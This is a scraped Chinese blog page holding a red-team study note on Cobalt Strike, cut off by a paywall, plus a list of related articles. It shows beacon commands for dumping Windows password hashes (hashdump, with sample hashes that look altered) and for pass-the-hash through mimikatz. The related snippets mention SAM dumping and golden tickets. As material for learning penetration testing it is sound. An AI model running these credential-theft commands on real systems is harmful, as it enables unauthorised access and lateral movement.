【CS学习笔记】18、密码哈希散列设置信任

最新推荐文章于 2024-05-28 22:25:32 发布
最新推荐文章于 2024-05-28 22:25:32 发布
阅读量621 收藏
点赞数
分类专栏: 学习笔记 CS 学习笔记 文章标签: Cobalt Strike 红队 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37683287/article/details/108292987
版权
本文介绍了如何通过密码哈希获取系统信任,涉及Kerberos票据的查看与清除,以及详细步骤来伪造黄金票据,包括所需条件如域的SID、KRBTGT用户的NTLM哈希等。Cobalt Strike被用来辅助这个过程,并强调了正确填写Domain的重要性。
摘要由CSDN通过智能技术生成

0x00 前言

继续上一节密码哈希的部分,在上一节中讲到了使用密码生成用户的令牌,从而取得系统的信任,这一节将介绍使用密码的哈希值来取得系统的信任。

0x01 密码哈希

首先使用 hashdump 获取用户的密码哈希值,这里的 beacon 会话为 SYSTEM 权限。

beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
Administrator:500:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
Daniel:1000:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
Guest:501:aca3b435b5z404eeaad3f435b51404he:31d6cfe0d16ae931b73c59d7e0c089c0:::
TeamsSix:1002:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::

使用 pth 获取信任

beacon> pth TEAMSSIX\Administrator 12cb161bvca930994x00cbc0aczf06d1
[+] host called home, sent: 23 bytes
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:TEAMSSIX /ntlm:12cb161bvca930994x00cbc0aczf06d1 /run:"%COMSPEC% /c echo ade660d8dce > \\.\pipe\8d3e4c" command
[+] host called home, sent: 750600 bytes
[+
最低0.47元/天 解锁文章
TeamsSix
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msf 使用 hashdump 和 wce 提取 hash
发哥微课堂
01-21 1万+
0x00:介绍 msf 在获取 shell 后为了更方便的进行渗透测试,可获取主机的 hash 以及域的 hash,即用户的密码,存在于 c 盘下的 windos 下的 system32 下的 config 下的 sam 文件中,以 hash 加密的方式存储,而系统开机后,hash 密码会以明文存在于内存中,获取 hash 的工具和方法有很多,这一节记录下 hashdump 和 wce 的使用。...
【内网安全】域横向网络&传输&应用层隧道技术
_Co1a
09-23 1707
必备知识点: 1.代理和隧道技术区别? 代理只是为了解决网络通信问题,有些内网访问不到,可以用代理实现 隧道不仅是解决网络的通信问题,同时更大的作用是被防火墙甚至入侵检测系统进行拦截的东西的突破。 2.隧道技术为了解决什么? 3.隧道技术前期的必备条件? 应用场景是你已经获得控制权但是你不能对控制的东西进行信息收集,很多不方便的操作等 在数据通信被拦截的情况下利用隧道技术封装改变通信协议进行绕过拦截CS、MSF无法上线,数据传输不稳定无回显,出口数据被监控,网络通信存在问题等(隧道技术能..
后渗透攻击(三)
hmysn的博客
12-25 2818
在进行提权后我们的操作空间就会大很多,可以进行一系列的创建新账户、获取账号密码、远程操控屏幕等等的操作。该文章就对一些常用的操作进行了整理。
Windows登录的明文密码如何存储?使用hashdump抓取的密文包含哪些部分?
最新发布
m0_71474212的博客
05-28 677
它是一种质询/应答身份验证协议,用于在网络环境中验证用户的身份。NTLM协议既可以为工作组中的机器提供身份验证,也可以用于域环境身份验证。在NTLM认证的过程中,客户端回和服务器进行一系列的交互,以便于验证用户的身份;
CobaltStrike之后渗透
Longwaer
02-12 1437
学习掌握CobaltStrike后渗透技术,更好的用于内网横向。
CobaltStrike使用-第七篇(获取信任、凭证、哈希认证、Kerberos票据、横向移动)
Love&Share
12-06 3025
文章目录获取信任->登录认证登录令牌凭证哈希认证Kerberos 票据黄金票据横向移动基本步骤1.创建可执行文件2.上传可执行文件3.1执行文件-方法13.2执行文件-方法23.3执行文件-方法3 获取信任->登录认证 如果当前账号权限被系统认为是本地管理员权限,那么就可以执行很多管理员才能做的事,接下来就来看一下这样的一个过程是如何工作的,其中会涉及到以下要点: Access Token 登录令牌 Credentials 凭证 Password Hashes 密码哈希 Kerberos T.
哈希学习笔记.docx
05-08
### 哈希学习笔记知识点详述 #### 一、什么是哈希表? 哈希表是一种高效的数据存储结构,其基本思想是通过一个特定的函数(哈希函数或散列函数)将输入的关键字映射到一个固定大小的空间内,从而实现数据的快速...
关于哈希散列)算法的8个问题
01-07
按这个思路,采用散列技术将记录存储在一块连续的存储空间中,这块连续存储空间称为散列表或者哈希表。那么关键字对应的记录存储位置我们称为散列地址。 散列技术最适合的求解问题是查找与给定值相等的记录。对于...
哈希算法_蒟蒻学习笔记
02-23
哈希
java加密算法--MD5加密和哈希散列带秘钥加密算法
09-01
主要介绍了java加密算法--MD5加密和哈希散列带秘钥加密算法源码的相关资料,这里附实例代码,帮助到大家学习理解,需要的朋友可以参考下
Hash-Buster:数秒之内的哈希散列
04-28
为什么您可以破坏哈希散列? 特征 自动哈希类型识别 支持MD5,SHA1,SHA256,SHA384,SHA512 可以从文件中提取和破解哈希 可以从目录中递归找到哈希 多线程 绝缘与用法 注意: Hash Buster与python2不兼容,请改为...
Cobaltstrike系列教程(五)凭据导出
J0o1ey Blog
08-03 3204
0x000-前文 有技术交流或渗透测试培训需求的朋友欢迎联系QQ547006660 2000人网络安全交流群,欢迎大佬们来玩 0x001-凭据导出 凭据说的通俗易懂一点,可以理解为目标机的账号,密码 凭据导出是渗透测试中即为重要的步骤,导出目标机凭据后,我们可以使用凭据实现横向移动(利用hash传递,smb/rdp爆破等等手法)来扩大我们的战果 0x002-Hashdump导出hash 选择b...
内网渗透--CS伪造黄金票据与白银票据
Armandhe的博客
06-24 3536
性感作者,在线翻车
Cobaltstrike系列教程(四)菜单栏与视图
J0o1ey Blog
08-01 2644
0x000-前文 有技术交流或渗透测试培训需求的朋友欢迎联系QQ547006660 2000人网络安全交流群,欢迎大佬们来玩 0x001-Cobaltstrike菜单栏 1.新建连接 2.断开当前连接 3.监听器 4.改变视图为Pivot Graph(可以显示各个目标的关系) 5.改变视图为Session Table(会话列表) 6.改变视图为Target Table(目标列表) 7.查看凭据...
牛掰!从sql注入到连接3389只需这几步
Appleteachers的博客
05-21 2144
REST 是一种现代架构风格,它定义了一种设计 Web 服务的新方法。和之前的 HTTP 以及 SOA 不同,它不是一个协议(即:一套严格的规则),而是一些关于 Web 服务应该如何相互通信的一些建议和最佳实践。按照 REST 最佳实践开发的服务被称为 “RESTful Web 服务”。 安全性是 RESTful 服务的基石。启用它的方法之一是尽可能内置用户身份验证和授权机制。 在 RESTful 服务中实现用户身份验证和授权的方法有很多。我们今天要讲的主要方法(或标准)有: Basic 认证 OAuth
Cobaltstrike系列教程(十三)控制持久化
J0o1ey Blog
01-19 5458
0x000-前文 有技术交流或渗透测试培训需求的朋友欢迎联系QQ547006660 2000人网络安全交流群,欢迎大佬们来玩 群号820783253 0x001-右键菜单实现控制持久化 在windows中,拿到目标主机权限后,,维持权限是必不可少的工作。 目前常见的手法有: 1.注册表 2.启动项 3.计时任务 4.设置服务 5.shift后门 6.dll劫持(白加黑) 7.利用其他安装的软件 ...
cs linux内网渗透,记一次利用cs进行内网渗透的过程
weixin_30830643的博客
05-15 791
记一次利用cs进行内网渗透的过程​首先搭建好cs的服务端和客户端连接,下面正式进行渗透环境kali:192.168.0.226域控机:192.168.0.138成员机:192.168.0.251 192.168.0.141操作cs上线首先开启监听cobalt->listeners,host和beacons都为cs服务端的ip地址生成相应的windows木马,上传到靶机251中执行。选择对应的...
关于哈希攻击的原理介绍
m0_48520508的博客
11-20 1024
在内部入侵测试期间,横向移动是白帽子黑客技术人员寻求信息以提高他或他对信息系统的特权的重要组成部分。在这种情况下,被称为“传递哈希”的技术就非常有用,可以成为一组计算机上的管理员。我们将在这里详细介绍这种技术的工作原理。 NTLM协议 NTLM协议是Microsoft环境中使用的身份验证协议。特别是,它允许用户证明自己对服务器的身份,以便使用该服务器提供的服务。 注意:在本文中,术语“服务器”在客户端/服务器的意义上使用。“服务器”很可能是工作站。 有两种可能的方案: (1)用户使用服务器本地帐户的凭据,
读取 Windows Hash 密码两种方式
weixin_46079186的博客
12-10 979
管理员执行cmd reg save HKLM\SYSTEM C:\sys.hiv reg save HKLM\SAM C:\sam.hiv 导出注册表文件 下载mimikatz https://github.com/gentilkiwi/mimikatz/releases 配置环境变量 我们在c盘目录下,命令行直接执行 mimikatz.exe lsadump::sam /sam:sam.hiv /system:sys.hiv ...
redis 哈希散列
11-15
Redis哈希散列是Redis中的一种数据结构,它类似于Python中的字典或者Java中的Map。它由一个键和一个值组成,其中键是一个字符串,值可以是字符串、数字或者另一个哈希散列。Redis哈希散列可以用于存储和访问对象的属性,例如用户的姓名、年龄和地址等信息。 以下是Redis哈希散列的一些常用命令: 1. HSET命令:设置哈希散列中指定字段的值。 ```shell HSET key field value ``` 2. HGET命令:获取哈希散列中指定字段的值。 ```shell HGET key field ``` 3. HGETALL命令:获取哈希散列中所有字段和值。 ```shell HGETALL key ``` 4. HDEL命令:删除哈希散列中指定字段。 ```shell HDEL key field ``` 5. HEXISTS命令:检查哈希散列中是否存在指定字段。 ```shell HEXISTS key field ``` 6. HKEYS命令:获取哈希散列中所有字段。 ```shell HKEYS key ``` 7. HVALS命令:获取哈希散列中所有值。 ```shell HVALS key ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值